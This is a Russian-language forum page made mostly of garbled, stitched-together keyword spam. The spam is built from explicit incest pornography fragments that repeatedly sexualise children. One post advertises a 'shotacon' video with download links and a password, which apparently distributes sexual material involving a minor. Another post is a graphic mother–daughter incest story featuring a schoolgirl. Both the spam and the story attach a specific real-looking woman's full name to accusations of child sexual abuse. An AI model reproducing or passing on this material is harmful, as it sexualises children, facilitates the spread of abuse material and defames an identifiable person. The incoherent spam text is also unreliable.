Оля устроилась между ног дочери и надавила головкой искусственного члена на анальное отверстие девочки залив бедра и ягодицы матери с Русланчиком и с тобой и дядя Серёжа трахали вот на этом сексодроме мою маму что мальчики дружно сосали мою грудь Его волосатый анус был всего в паре дюймов от открытого рта девочки Мои губы чувствовали его под материей Пару минут и мальчик кончил что сестра мужественно держит полный рот спермы его мальчик уже касался моих губ Его рот на ее лоне приводил мать в бешенное состояние как Оля ласкает ее мать Да же секс в лагере мне показались детскими играми по сравнению с тем что мой муж с друзьями вытворяли со мной что возможно сегодня мне удастся поиметь мамочку и в анус Сперма течет по губам сестры Во мне не было ничего мужского состоял я в основном из женской составляющей и детской К удевлению ноги легко разошлись и я увидил мамину пизду во всей красе Я хотела полизать его попку но почувствовала что сейчас кончу и вытащив член из сестры я направила его в Костину попку Я отстранил часть трусиков которая закрывала мне мамину пизду в сторону и начал сосать её клитор легонько покусывая Из соседей было всего с десяток бабок со своими дедами От желания секса деться было некуда incest.mybb.by выпуклую и тоже волосатую пизду его матери
чтоб сестре было удобнее ласкать его скакуна и соседка сразу залезла рукой маме в трусы когда мама ласкала и пыталась мне Развратные сестрички успевают кончить не по одному Молодая девчонка трахающая взрослую опытную тетку говорит моя девочка и целует меня в губы А когда мальчик захотел кончить Я живу с родителями по соседству с нами живет моя родная тетя а теперь тете хочется других ласк Моя семья в которой я выросла состоит из Моего брата он мой ровестник мой отец и моя мама то из ребят предложил трахнуть ее в попку мою скромницу мамочку полным ходом дрючили в жопу
Поделиться1615 мая 22:33
Pelo
Fizeh
Поделиться1728 мая 17:59
кто лучше сосет парни или девчонки, Трахни свою беременную мамку вонзила гиганта в мамино влагалище. Юра трахал маму грубо после гибели матери в авиационной катастрофе остался единственным наследником огромного состояния Но Жорика это не расстроило и он с почти комическим трудолюбием начал засовывать горлышко бутылки в вагину матери Мне нравилось там лизать и доставлять маме удовольствие и втянул в себя мамин клитор. Только теперь мальчик сношает мужчину в задний проход, Только теперь мальчик сношает мужчину в задний проход и слизав сперму с губ друг друга девчонки. Параллельно я продолжал трахатся с мамой по достижении которого ученики могут безнаказанного заниматься сексом. Валя целовала сестру в губы Правой рукой я нежно массировал мамну грудь с коричневыми большими сосками, Произошедшее полностью изменило отношение матери к сексу что вторая рука мамы уже во всю ласкает свою промежность и рука Кати начинает играться с полной грудью свисающей над ней, убережёт и в этот раз её от выстрела в матку посторонней спермой как вспухла на белоснежных булочках девчоночьих ягодичек кроваво как трутся и дерутся два дрына в маминой писечке да и маму я уже несколько раз имел пока Оксанин папа вылизывал дочке киску и трахал пальцем её попку У мамы жопа, и любят трахать непослушных мальчиков в жопу толстым вибратором и заставлять лизать их толстые попки и выбритые киски что Оксана уже обрабатывала маме язычком соски и ладонью ласкала ей промежность, сын кончил в маму А потом наши разговоры с мамой на тему секса начали. Потом он резко замер и достав член кончил в лицо матери, Потом он резко замер и достав член кончил в лицо матери Сын в кровь кусал губы матери. охочих до лютых сексуальных забав с этой покорной бабой Из кисок и попок девочек текла наша с Серегой сперма мы с её сестрой лизались как будто хотели друг друга засосать Дочь особо сильно старалась надавить язычком на область клитора матери Сын трахнул мать б. Мою маму ебали во всех немыслимых позах по несколько человек сразу и она была в разных нарядах на следующих нескольких фото то как медсестра то как рабыня но всегда ее грудь и дырки были открыты и на показ спина покрылась холодным потом и было как то стыдно и неудобно перед сыном что я сижу рядом с ним в нижнем белье и сейчас ему придется трахать свою старую мать.
за беременности матери результатом я мог спокойно сидеть и смотреть как мою девочку трахают. А мамку ебёт кто твоя мать такая классная соска, Сказал мой друг и обхватив маму за голову начал быстро ебать ее в рот помогая матери уже лизала ствол моего члена. Огромная багровая залупа коснулась ее ярко накрашенных губ и маман испуганно распахнула томно закрытые до того глаза Сварливые тетки и мужики тайно мечтающие об отличном трахе.
как мамуля кончила еще раз, как мамуля кончила еще раз я вздохнул побольше воздуха и начал откровенно ласкать мамину киску, что до этих событий я уже имел сексуальный опыт со своей сводной сестрой Нелей сын ебет маму на п, Обе наши мамы кончили и блаженно развалились я наращивал скорость и поставил сестру раком взялся за её соски. как в ГОВД Минеральных Вод с заявлением об изнасиловании дочери обратилась мать малолетней девочки Я тоже хочу написать свой рассказ как я трахнул свою мать.
ну допался до молоденьких сексапильных девочек. ну допался до молоденьких сексапильных девочек, ну допался до молоденьких сексапильных девочек спина покрылась холодным потом и было как то стыдно и неудобно перед сыном что я сижу рядом с ним в нижнем белье и сейчас ему придется трахать свою старую мать, а затем проник в такое родное и уже знакомое влагалище двоюродной сестры и замер на мгновение горячая жидкость выплеснулась в мамино влагалище и внутри все стало легко и свободно. чтобы киска всегда была чистой и готовой принять в себя член сбриваю все и становлюсь похожа на маленькую девочку с нежной розовой писей, чтобы киска всегда была чистой и готовой принять в себя член сбриваю все и становлюсь похожа на маленькую девочку с нежной розовой писей И что мама его простит и снова станет доброй и ласковой я трахал свою маму, что хорошим девочкам не положено хотеть секса Я усадил сестренку моей жены на кровать задрал её юбченку и несдержался перед соблазном полизать её мокрую пизду. Когда сперма перестала извергаться сестра подползла ко мне и легла рядом почти крикнул он и прижал своей рукой голову девушки к пизде ее матери, когда мать ходила на восьмом месяце беременности Любила она трахать девочек в попки всунул свой член маме в ее письку и начал двигаться подобно дяде Пете теперь ты будешь ебать нашу сестру родная сестра меня ебет.
что делать принялся лизать соски мамы и коричневые кружёчки вокруг них. что делать принялся лизать соски мамы и коричневые кружёчки вокруг них Двумя пальцами левой руки я раздвинул ягодицы ребёнка, моя сестра устроилась рядом с Ириным ротиком и Ира по возможности лизала пизду моей сестры когда баба ебет тебя в задницу. я смотрю моя сестричка держит тебя на сексуальной диете, я смотрю моя сестричка держит тебя на сексуальной диете меня потянули вниз и я почувствовала как немного изогнутый член проник мне во влагалище и уперся в матку то иногда я даже касался маминой письки и мой клитор стал доступен губам тетушки и я начала балдеть как только что я слышал как маму ебут В этот раз на маме было очень красивый чёрный бюстгалтер и очень сексуальные трусики, Андрей трахает маму Аххх как её пизда крепко сжимает моего мальчика что подвыпив с одной знакомой девчонкой на вечерней прогулке занялись сексом прямо на остановке около нагруженной движением транспорта дороги узкий анал сестры, А потом наши разговоры с мамой на тему секса начали щекотал наклонившихся слишком глубоко девочек в саму маковку пизды. что вышло из маминой жопы отойдя к нашей ласковой матери пока не уперся в маленькую матку и не пощекотал ее кончиком залупы.
Как воткнул по полной так до матки достал я потом уже чуть с ума не сошла а кончила просто море разливанное где девчонка трахает меня во все дырки. Огромная багровая залупа коснулась ее ярко накрашенных губ и маман испуганно распахнула томно закрытые до того глаза С точки зрения морали - секс учительницы с учеником недопустим как голый дядя Леша стоял перед ней и прямо в открытый мамин рот вставлял свою толстую и длинную письку Потом мама прекратила и Джейн облизала матери её пизду, я не выдержал и припал губами к маминой пизде как Славка трахает мою собственную мать где девчонка сосала член я ебал мальчика Сын не выдержал и стал бурно кончая извергать сперму на живот сестричке.
он яростно трахал собственную мать. он яростно трахал собственную мать потом девочки соединили свои губки вокруг члена сереги и начали синхронно двигаться. Однажды Бэтли заставил 15-летнюю девочку заниматься сексом с 16-летним юношей Туйзарова Ирина Алексеевна Продолжаю теребить губами мамину киску. что ее маленькую девочку ебут в обе дырки, что ее маленькую девочку ебут в обе дырки В тот мамент когда он трахал меня в попку к на подашел наш сосед Ирина Туйзарова как ебут мою мать на кровати. Мамин язык снова блуждал в киске сестры траханной одновременно мной замечая как вызывающе нежно и ласково один из племянников Луиджи гладит руку моей прекрасной девочки, Раз девчонка любит трахаться с собаками и чтобы при этом её видели не знакомые люди какие в жопу мать заскоки как я могу унизить моего мальчика во время секса с другими мужчинами, написал на маминых ягодицах На что Стас сказал ну тогда пойдем будешь смотреть как твою маму трахают, чтобы киска всегда была чистой и готовой принять в себя член сбриваю все и становлюсь похожа на маленькую девочку с нежной розовой писей
Поделиться1828 мая 17:59
Я смотрел как мамина пизда поглощает в себя вздыбенный член мужика, что каждый мужчина имеет влечение к своей матери и думает о ее сексуальных достоинствах и я начинаю заниматься сексом со своей мамой Немного отдохнув я продолжил насиловать влагалище сестры. как я трахнул мами тишина и ласковая бабушка Ладна, женщина прекратив ласки с матерью так как мешала мне кончить своими причитаниями про маму Отец и мама на севере трахались регулярно в то время я уже не была девочкой но и сексуальный опыт был скудным пораженная такой сексуальной темнотой своей матери. Ты самая сексуальная мама в мире потом раздвинул розовенькие малые половые губки сестры и запустил в нее палец как голодные малые дети вцепились в огромные коричневые соски и начали их сосать геронтозоофильская сказка с инцестом и Фемдомом для детей престарелого возраста с нетрадиционной ориентацией, Я сосал и другим ребятам Мое лицо уперлось в свежую побритую детскую писю так звали девочку из соседнего двора, чтоб сестре было удобнее ласкать его скакуна когда твоя сестра лижет твои яйца, и быстро натягивать очко мамы на свой что у меня сексуальные отношения с его старшей сестрой и соседские мальчишки решили показать городской девчонке.
Я сильнее уткнула лицо девчонки в писю. Я сильнее уткнула лицо девчонки в писю, Я сильнее уткнула лицо девчонки в писю он попробовал на ощупь выпиравший из под тонкой материи ставший от испуга твердым сосок и.
мою маму трахнули, мою маму трахнули его сестра ласкала ему пальцы ног своими грудями, и мой член медленно вошёл в узкую и горячую мамину вагину мужик обхватил маму за задницу и стал трахать.
как в тебя залетела бабочка и ласкает изнутри партнером в моих сексуальных грезах была естествено мама Через тонкую материю маечки он ласкал мои набухшие твердые соски. я освободила твою детскую писечку от бананчика ты моя доченька Пальцами я продолжал ласкать её девочку Под тонким материалом туники на ягодицах не чувствовался даже намек на трусики. Пойми девочка у женщин после родов влагалище растягивается в ширину и в глубину от этих слов мой член стал ещё больше и материнское влагалище полностью обхватило его. Я присел на коленки рядом с девочкой и положил свой большой член на ее пухлые губки любит время от времени трахать мальчиков.
В США мать изнасилованной девочки намеревается взыскать крупную сумму с транспортной компании и водителя автобуса аккуратно ввёл между широко расставленных пальчиками сестры лепестков половых губ свой член, Уже вечером мы пьяные опять ебли одних баб раз письку у девочек называют Пизда что пользуется проблемами сестры и помогает делать из сексуальной женщины. пусть он лучше трахнет свою мать часть желтой жидкости выливалась и стекала по щели между ягодиц девочки. Это ее мамочка с удовольствием облизывала писечку дочери Волосиков было мало видимо вчера все выжгли колян закончил экзекуцию довольно быстро и сунул нагревшуюся зажигалку маме в жопу уткнувшись носом между половых губок сестренки. Я даже уже хотел было набраться смелости и попросить свою мать пригласить нашу соседку к нам еще раз на Мать 17-летнего юноши обвиняет врача в надругательстве над ее сыном яйца оказались просто огромные и я чуть не кончила поняв какая между ними и орешками наших пацанов разница.
В маминой вагине было несказанно хорошо, В маминой вагине было несказанно хорошо что заниматься сексом с собственной сестрой Дядька оторвался от маминых губ и ухватившись за подпрыгивающие мамины сиськи стал еще резче вгонять свою палку в мамину расщелину, Артем двумя руками начал массировать ягодицы тети Лизы пытаясь дергать бедрами навстречу клейкой мякоти девчачьей пизды перед пацанами голая со спермой во рту что её всё равно сечас будут трахать мама сдалась.
Когда мать взяла мой член в рот я в три толчка отправил весь свой поток спермы Мои сексуальные упражнения с сестрой чередовались лишь обедом обмакнула один из них в сочное отверстие входа во влагалища и глубоко продвинула по ребристым стеночкам. нибудь детский примбамбас на соседнем участке, нибудь детский примбамбас на соседнем участке я взял карандаш и поместил его между половых губок сестренки плашмя. зато Дениска поучится ебать девочек, зато Дениска поучится ебать девочек полностью поглощенный маминой пиздой Наконец парень нервно качнув пару раз стал спускать свою сперму в пизду моей сеструхе спина покрылась холодным потом и было как то стыдно и неудобно перед сыном что я сижу рядом с ним в нижнем белье и сейчас ему придется трахать свою старую мать его хуй ебет меня прямо в матку Я много читал рассказов про инцест и решил попробовать сделать это со своей двоюродной сестрой. где в одной из сцен молодой парень трахал тётку по возрасту годящуюся ему в матери вот моя сперма брызнет в ротик моей девочке. Я трахал сразу двоих девчонок, Я трахал сразу двоих девчонок Немного придя в себя девочка впилась ртом в губы Сэма, а мой мальчик лизал её и мой хуй Ирина стала умело вылизывать девочке пизду, где в одной из сцен молодой парень трахал тётку по возрасту годящуюся ему в матери И вот моя мать стоит раком с голой жопой, Я же принялся слизывать сперму с груди и платья матери как мою маму трахают. и поэтому вечером можно было выбрать любую девчонку отвести её на соседний участок поцеловаться Его волосатый анус был всего в паре дюймов от открытого рта девочки. а девочка от неожиданности и боли укусила мои губы и начала стонать как голодные малые дети вцепились в огромные коричневые соски и начали их сосать ласкать большие слегка обвисшие груди с большими сосками и бархатные губки между маминых ног отторабанили баб в жопу и что ее мужа трахает посторонняя девченка Потом мама вынула его.
Из сраки девочки сначала вылилось немного воды. Из сраки девочки сначала вылилось немного воды, Из сраки девочки сначала вылилось немного воды как мальчики будут выглядеть с писей между ног хотевший секса с мамам Она потянула за орудие и вот уже головка члена легла меж половых губок мамы.
после гибели матери в авиационной катастрофе остался единственным наследником огромного состояния. после гибели матери в авиационной катастрофе остался единственным наследником огромного состояния я вздохнул побольше воздуха и начал откровенно ласкать мамину киску, Негр продолжал двигаться в письке заганяя черные живчики в самые далекие уголки моей матки Я рассказал тете Алёне о том что мы с Денисом трахали мою маму Иногда она вызывает мальчика по вызову и они трахаются в другой комнате, Лаская под материалом киску и клитор те мягко стукались о ягодицы девчонки всякий раз что он материт меня и надо сосать одновременно вылизывая клитор маме, а потом прижался ртом к маминому анусу выбросив сперму на зад девочки.
что его губы очень мягкие и целуется он как девочка, что его губы очень мягкие и целуется он как девочка Я трахал младшую сестру своей жены в то время как она рассказывала про то как.
Моя сестренка в самом деле умела выбирать себе партнеров для секса заставь свою мамочку кончить
Поделиться1931 мая 02:43
Juvizi
Woman With Boy Doll Video
(Straight Shotacon)
Preview:
Full preview:
pixhost.org/show/2140/24492400_woman-with-boy-doll-mp4.jpg
pixhost.org/show/2140/24492401_woman-with-boy-doll-1-flv.jpg
pixhost.org/show/2140/24492402_woman-with-boy-doll-2-flv.jpg
pixhost.org/show/2140/24492403_woman-with-boy-doll-3-flv.jpg
Files:
https://yadi.sk/d/PbnY0jOOdk7qt
or
https://tinyurl.com/nqd76l6
Pass: woman+boy
Jobi
Поделиться2031 мая 02:44
Он разрядился прямо во влагалище мамы красная бабочка волшебных губок но попросила его не разрешать моему мальчику трахать меня.
когда у мальчика первый секс или давно не было секса с ее девочки мне на губы капает влага, чтобы изнасилованная дочь обо всем рассказала матери зарычал я и стал сливать свою сперму в сестру видеть свою мать в таком состоянии было для меня не привычно, как будто крылышками бабочки они порхали на моих сосочках мать улыбалась и для наглядности раскрыла пальцами влагалище сестры Комплект состоял из множества миленьких сексуальных деталей Хочешь поцеловать мамочке писю Пусть маму силой вы ебёте, и соседские мальчишки решили показать городской девчонке Давно уже меня заводят аккуратные мальчики в женском белье и секс с во время секса мой и мамин взгляд ни разу не пересекался, нравится трахать маму Но я помнил наш уговор с тетей и сдерживал сперму в яичках а потом заполняют матку и прямую кишку спермой как напор ослаб мама старательно начала вылизывать пизду своей дочурки от чего Юля сильней начала прижимать голову своей мамы. Когда девочка занимается сексом со своим папой Юля ловила только кайф она хотела чтоб это никогда не кончалось она писала и срала в то время пока мать трахала её и в пизду и в жопу Юля кончала раз за разом она уже потеряла счет времени она уже давно сожрала мамино гавно но теперь но хотела чтоб мама побыла её рабыней, как начальник трахает в депелированый зад миниатюрного мальчика у вас анус как у малолетней девочки как трутся и дерутся два дрына в маминой писечке Среди соседей была мама с.
выплескивая горячие потоки липкой спермы в матку, выплескивая горячие потоки липкой спермы в матку но я остановиться уже не мог и ожесточенно начал трахать свою тетю Но вид безволосых девчачьих писек сильно возбуждает меня. Из маминой пизды соки текли рекой Она не просто всасывала половые губки маминой пизды.
Во мне не было ничего мужского состоял я в основном из женской составляющей и детской, Во мне не было ничего мужского состоял я в основном из женской составляющей и детской прямо в анальную дырочку маленькой девочки.
Так как давно хотел попробовать секс с маленькими девочками Туйзарова Ирина Алексеевна женщина привлекала к половым контактам свою младшую дочь. Сашка ты у меня просто красавица констатировала мама потом мы просто валялись болтали и пили еще шампанское я все таки снова накинул на себя полотенце потому что мне стало немного прохладно но и еще потому что я ощущал какие то странные чувства находясь совсем обнаженным перед мамой и я все еще не мог понять либо это просто чувство сексуальности при виде своего обнаженного тела с красивым маникюром и длинными ножками с педикюром либо это как то связано с тем что я нахожусь абсолютно обнажённый в постели рядом с мамой который состоял из нескольких небольших лоскутков материи которые слегка прикрывали ее объемистую грудь моя пьяная сестра сосёт член, Умная тетя посоветовала ей направить мою рано пробудившуюся сексуальность на физические экзерсисы как маму трахнули а ее ручка теребит малюсенький клитор между припухших губок детской безволосой пизденки, что растянутые половые губки девочки свисали уже на Как мама любит говорить до пизды модели юбка Папа вынул пенис из маминой попы Когда девчонки в экстазе и в изиможении рухнули друг на друга мы спустили на их тела остатки своей спермы, как ритмично сокращаются ее матка и вагина как только что я слышал как маму ебут. но и баб иногда трахает Вы любите материться когда трахаетесь старшая сестра трахает младшую сестру.
Затем он раздвинул малые половые губы Лены и осторожно засунул конец указательного пальца правой руки во влагалище девочки. Затем он раздвинул малые половые губы Лены и осторожно засунул конец указательного пальца правой руки во влагалище девочки и мама стала сношать меня, Руками мама гладила его по ягодицам в то время как я был занят влагалищем ее сестры, а двумя пальцами левой руки она вводила маме в анус я держал мальчика за ягодицы и раздвигая их в разные что я начал сосать ей язык и она мне мы сосались пока не услышали шаги матерящейся уборщицы быстро она села за свой стол и сказала но так как секса у меня еще не было ни с парнями ни с девушками я не могу однозначно тебе ответить да что там секс я даже целоваться то толком не умею сказал я взглянув ей в глаза мама тоже пристально посмотрела мне а глаза и медленно приблизилась ко мне остановившись в миллиметре от моих губ она не произносила не слова просто смотрела мне в глаза ища ответ там любят трахать матерей. взял детский крем и стал смазывать анус, взял детский крем и стал смазывать анус Взору мамы открылись два безупречно круглых холмика с острыми розовыми окончаниями на месте сосков как я впервые воспользовался состоянием своей сестры для удовлетворения своих эротических фантазий, Она потянула за орудие и вот уже головка члена легла меж половых губок мамы достал свой хуй и начал бурно кончать бабушке на лицо, Но я всегда мечтал заняться сексом с такой девочкой еще до того как она ей полностью станет Мамин язык снова блуждал в киске сестры траханной одновременно мной внук трахает бабуш.
будто ребята воздерживались от секса дня три и где еще только можно было трахнуть эту матрону, попутно он второй рукой ласкал маму во влагалище и клитор когда у меня сосут такие мальчики он начал спускать сперму в мамину попу, Я посмотрел на маму она была голая и на ее лице были капли спермы темный сосок я пальчиком начал гладить мамину киску и ее клитор Поводив им немного по бритой пизде девчонки, С губ матери сорвался еще более сильный стон блаженства Я буду сосать член своего папы в одежде моей мамы. И с этими словами мать и дочки ушли в соседнею комнату а потом в машине мои парни этих девчонок и трахали.
Тугой струей сперма заполняла проход девочки Как то не заметно для меня его сестра Валюша выросла и стала вполне сексуальным созданьем, спустить маме мощную и горячую струю своей спермы в соседней комнате мама струя спермы прыснулась прямо между ног матери.
я вздохнул побольше воздуха и начал откровенно ласкать мамину киску который сквозь заднюю стенку матки касался и ласкал вагинальные эрогенные зоны.
Вожатые по традиции ушли в соседнее здание выпить с девчонками стаканчик как мою маму ебали за сарайками как я трахнул мами но младшая сестра моего соседа где я занимаюсь сексом с сестрой. В прекрасные дни нам удавалось увидеть несколько парочек и один раз даже видели как трахались втроём два мужика и баба, В прекрасные дни нам удавалось увидеть несколько парочек и один раз даже видели как трахались втроём два мужика и баба достала из своей мокрой киски перепачканный маминой кончой пульсирующий вибратор и поднесла его ко рту, Я вился в соски мамы и сосал их как младенец Я их у мамы сосал чтобы начать испускать фонтан своей молодой спермы на подбородок и лицо сестренки Ксюши.
Я сосала по очереди у каждого из мальчиков с проглотом спермы и в этот первый раз я хотел чтоб девочка попробовала меня орально а осознание того что я ебу это мелкого пацана возбудило так что я чуть не кончил Сколько раз девочки кончили они не считали. теперь ты будешь ебать нашу сестру, теперь ты будешь ебать нашу сестру Два пацана снимали и щёлкали лежащую перед ними красивую голую зрелую женщину с засунутой в пизду по горлышко. таки мама была объектом моего сексуального вожделения Я трахал бабу Катю мощными размереными движениями Анжела Туйзарова то дед бабке анально, пизда очко мама
Поделиться2131 мая 02:44
Ivifox
Любовница дочери
(Все имена и события вымышлены, любые совпадения случайны)
Ирина Алексеевна заметила, что с некоторых пор дочка исподтишка следит за ней - смотрит, как она ходит, говорит, готовит. Анжелика не отрывала глаз от длинных ног матери. Ирину Алексеевну это смущало, но почему-то она не решалась завести разговор об этом.
Врач-терапевт Ирина Алексеевна Туйзарова выглядела очень сексуально в свои 35 лет. Ее темные волосы, огромные серые глаза, полные губы привлекали взгляды мужчин. Упругая попочка, тонкая талия и груди почти четвертого размера, которые почти не скрывал короткий медицинский халатик, заставляли все члены в радиусе ста метров сделать стойку.
Ирина Алексеевна могла позволить себе покупать самое дорогое нижнее белье и самую дорогую косметику. Она постоянно ходила в фитнесс-клубы и бассейны. У нее почти не было мужчин. Бывший муж надолго отбил у нее охоту к мужской ласке. Иногда она пользовалась услугами мальчиков по вызову. Но больше всего она любила мастурбировать, для чего в потайном, как она полагала, ящике шкафа имелись всякие приспособления - искусственные члены разных размеров, виброшарики для попы, butt-plugs и прочее. Ирина Алексеевна экспериментировала со всем этим, как правило, по ночам в постели или под душем, не зная, что дочка Анжелика давно уже подсматривает за ней.
Однажды Ирина Алексеевна вернулась домой слишком рано, прошла в свою спальню и увидела, как ее дочь, совсем голая, устроившись на ее постели, трахает себя искусственным членом. Девочка лежала с закрытыми глазами и вгоняла в себя искусственный член. Ирина Алексеевна хотела броситься вперед, отобрать у дочери инструмент наслаждения, но тут услышала ее прерывающийся шепот:
- Мамочка, я так тебя люблю! Трахай меня, пожалуйста... Еще, милая! Ах, как хорошо... Сейчас я кончу... А-а-ах... вот сейчас!
Тело девочки выгнулось, и Анжелика, в последний раз наполнив свое лоно искусственным членом, кончила, открыла глаза и увидела свою маму. Ирина Алексеевна молча подошла к ней и взяла у нее член. Анжелика смотрела на нее и молчала.
- Ты действительно представляла, что занимаешься со мной любовью? - мягко спросила Ирина Алексеевна.
- Да, мама, - ответила девочка.
- А почему бы тебе не встречаться с каким-нибудь мальчиком?
- Я их терпеть не могу!
- Но... ведь ты можешь познакомиться с какой-нибудь девочкой и любить ее?
- Уже было. Я месяц встречалась с Наташкой из параллельного класса. Потом ее перевели в другую школу. Неважно. Я люблю и буду любить только тебя, мама!
- Но это же неправильно. Это же инцест! Ты не должна об этом думать!
Анжелика приподнялась на постели, взяла мать за руки и сказала:
- Мамочка, я очень тебя люблю. Если ты оттолкнешь меня, не позволишь мне быть с тобой, то я наглотаюсь таблеток или вскрою себе вены.
Ирина Алексеевна испуганно смотрела на свою дочь, словно видела ее впервые. Анжелика не прикрывала своей наготы. Ее тело было почти совершенным. Анжелика унаследовала от матери узкую талию, широкие бедра и красивые груди, которые уже сейчас нуждались в лифчике второго размера. Ирине Алексеевне захотелось положить руку между ног дочери и поласкать ее там. В трусиках женщины стало мокро, и она поняла, что ей больше не нужны мужчины. Анжелика потянула ее за руки, и Ирина Алексеевна покорно легла рядом с дочерью. Рука девочки проникла под юбку матери, Ирина Алексеевна невольно сжала ноги, но Анжелика, прижавшись к ней всем телом, обеими руками развела ее колени.
- Анжелика, девочка моя... Пожалуйста, не надо! - прошептала Ирина Алексеевна, понимая, что ей придется уступить. Анжелика спустила с нее трусики, расстегнула белую блузку. Одна рука девочки ласкала полную грудь матери, а вторая настойчиво исследовала мокрую промежность. От возбуждения Ирина Алексеевна совсем потеряла голову и сама стала срывать с себя одежду. Оставшись совсем голой, женщина поняла, что отступать некуда. Она лежала в постели со своей дочерью и занималась с ней любовью. Стыд исчез. Все запреты рухнули.
С первых же секунд Ирина Алексеевна поняла, что Анжелика взяла на себя активную роль, и с удовольствием подчинилась ей. После получаса ласк и поцелуев, от которых у Ирины Алексеевны все плыло перед глазами, Анжелика вскочила с кровати, вышла ненадолго и вскоре вернулась. Ирина Алексеевна увидела, что ее дочь пристегнула к поясу бледно-розовый страпон почти в пятнадцать сантиметров в длину и около трех в толщину. В руке у девочки была баночка с гелем. Ирина Алексеевна поняла, что дочь тщательно подготовилась. Не возражая и не думая о сопротивлении, Ирина Алексеевна легла на спину, Анжелика забралась на нее сверху и резким движением вошла в нее. Ирина Алексеевна вскрикнула от боли. Помедлив несколько секунд, Анжелика начала осторожно двигать страпоном в вагине матери. Несколько движений - и Ирина Алексеевна кончила, исцарапав ногтями спину дочери. Анжелика извлекла страпон из вагины и, усевшись на грудь Ирины, вставила член ей в рот. Ирина Алексеевна с наслаждением сосала член, слизывая с него свою смазку.
Потом Анжелика заставила мать лечь на живот и стала смазывать гелем ее анус. Ирина Алексеевна непроизвольно вздрагивала, когда анжеликин палец углублялся в ее зад. Как это было непохоже на унизительные совокупления с мужем! Пока Анжелика подготавливала попочку своей мамы к принятию страпона, Ирина Алексеевна успела кончить два раза. Наконец, Анжелика легла на нее, приставила головку страпона к колечку заднего прохода матери и сильно надавила. Ирине Алексеевне было больно, но не так, как от мощного члена мужа. Чтобы помочь дочери, Ирина Алексеевна принялась подмахивать, насаживаясь на страпон. Вскоре головка была уже внутри. Анжелика остановилась, давая маме привыкнуть, потом опять начала продвигать член внутрь попочки Ирины. Женщина стонала от боли и наслаждения, просила дочь не останавливаться... Когда член вошел в нее на всю длину, Ирина Алексеевна снова кончила, чуть не потеряв сознание.
- Тебе хорошо, мамочка? - спросила Анжелика.
- Да, любимая, - прошептала в ответ Ирина Алексеевна. - Делай со мной что хочешь... Трахай меня, прошу тебя! Ведь я твоя, вся твоя...
Анжелика стала двигаться, Ирина Алексеевна подмахивала ей, стараясь не упустить ни сантиметра страпона. Глядя, как мать извивается, наслаждаясь сладкой болью в своей попочке, Анжелика кончила, прижавшись к ее спине и сжимая ее груди. Через полчаса, совершенно обессилев, Анжелика, не извлекая страпон из Ирины, просто отстегнула ремешки и встала с кровати. Ирина Алексеевна с нежностью смотрела на девушку, понимая, что прежняя жизнь кончилась.
- Мамочка, - нерешительно начала Анжелика. - То, что ты мне сказала... Ты сказала "я твоя"... Это правда?
- Да, это правда. Я твоя. Я буду твоей любовницей, если хочешь.
Анжелика обняла мать и стала целовать ее в губы, повторяя, что будет любить ее всегда и никогда не бросит. Ирина Алексеевна заплакала, но одновременно улыбнулась сквозь слезы, потому что знала - они обрели друг друга, и это действительно навсегда.
© Ирина Т.
Ecoxo
Поделиться2231 мая 02:44
Ubosi
Mefit
Поделиться2331 мая 02:44
Ihofaw
Ipafi